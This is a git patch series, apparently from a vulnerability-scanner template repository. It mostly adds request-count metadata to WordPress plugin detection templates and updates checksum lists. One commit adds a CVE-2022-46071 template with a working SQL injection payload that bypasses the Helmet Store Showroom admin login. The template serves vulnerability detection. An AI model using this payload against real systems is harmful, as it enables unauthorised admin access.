b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 44da26c74c929df665bc9d2ca5ab882975fb2d5f Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Fri, 30 Jun 2023 12:44:02 +0530 Subject: [PATCH 199/609] Create CVE-2022-46071.yaml --- http/cves/2022/CVE-2022-46071.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2022/CVE-2022-46071.yaml diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml new file mode 100644 index 0000000000..8ab54853ad --- /dev/null +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-46071 + +info: + name: SQL Injection - Login Page + author: Harsh + severity: critical + description: | + There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access. + reference: + - https://yuyudhn.github.io/CVE-2022-46071/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-46071 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-46071 + cwe-id: CWE-89 + metadata: + verified: true + tags: cve,cve2022,sql,admin_bypass +http: + - raw: + - | + POST /hss/classes/Login.php?f=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username='+OR+1%3D1+--+-&password=1234 + + - | + GET /hss/admin/ HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "Helmet Store Showroom")' + - 'contains(body_2, "Adminstrator Admin")' + condition: and From 8a0cd5585849be4bfe49822e89b4a4a592701b3d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Jun 2023 08:21:05 +0000 Subject: [PATCH 200/609] Auto Generated New Template Addition List [Fri Jun 30 08:21:05 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4068aa5366..86c9c90ca8 100644 --- a/.new-additions +++ b/.new-additions @@ -32,6 +32,7 @@ http/exposed-panels/syncserver-panel.yaml http/exposed-panels/wd-mycloud-panel.yaml http/exposures/configs/aws-config.yaml http/exposures/configs/aws-credentials.yaml +http/misconfiguration/codeigniter-errorpage.yaml http/misconfiguration/genieacs-default-jwt.yaml http/misconfiguration/grav-register-admin.yaml http/misconfiguration/installer/spip-install.yaml From beee171b98eeffcca9fef8368b8d6ee155df3776 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Jun 2023 08:21:43 +0000 Subject: [PATCH 201/609] Auto Generated Templates Checksum [Fri Jun 30 08:21:43 UTC 2023] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 003671d7e3..907bfae947 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3894,6 +3894,7 @@ http/misconfiguration/cloud-metadata.yaml:8778d2ecf82407b77b95a567d76fbd40a8d11e http/misconfiguration/cloudflare-image-ssrf.yaml:5cde64e35a786a2fed9498626ebaaea5429f7997 http/misconfiguration/cluster-panel.yaml:e53352d353b191f9b61b613fcc89e971284d03fb http/misconfiguration/cobbler-exposed-directory.yaml:b4ff1d7d46d661f7e27d23879280633028c1dd3d +http/misconfiguration/codeigniter-errorpage.yaml:97f2f5b97183a0fc700e723bdac5f59f4d184055 http/misconfiguration/codemeter-webadmin.yaml:3ad9e6225800a6a4213d5deaab056aec3df3a4f4 http/misconfiguration/codis-dashboard.yaml:7bf49a01e5f1776e0d0e1153a56a61b3960d508a http/misconfiguration/collectd-exporter-metrics.yaml:54946544cad933293c860c88a6178f1af904651b @@ -4133,7 +4134,7 @@ http/misconfiguration/prometheus/prometheus-flags.yaml:8fd4a885790d3ed82dc12de3f http/misconfiguration/prometheus/prometheus-log.yaml:644a43bf1feaa9733bdcd756b60ec9e2aa3806b7 http/misconfiguration/prometheus/prometheus-targets.yaml:f0916980c60f56c283147404674599ee79ae27d8 http/misconfiguration/proxy/metadata-alibaba.yaml:ba1dd0862f0b2b6bca8e88ce724fcb64ab1f7911 -http/misconfiguration/proxy/metadata-aws.yaml:1b858b4fefb26bd43b06bd2b076d8b320243c629 +http/misconfiguration/proxy/metadata-aws.yaml:cafd5319a94c654d7de59e8a88438d9cb766d060 http/misconfiguration/proxy/metadata-azure.yaml:b7651276f7a1316b7e9ee10d1977e61bdc26a9a0 http/misconfiguration/proxy/metadata-digitalocean.yaml:41276b057ad56ad2eeb95acd02ed58e0c7fc6a1b http/misconfiguration/proxy/metadata-google.yaml:f3ce729384eba1a220c57a7b133254fb9a0424b2 @@ -5320,213 +5321,213 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e -http/technologies/wordpress/plugins/easy-google-fonts.yaml:df81c34d041dc7b560434f676ad74b5d5d74d01a -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc 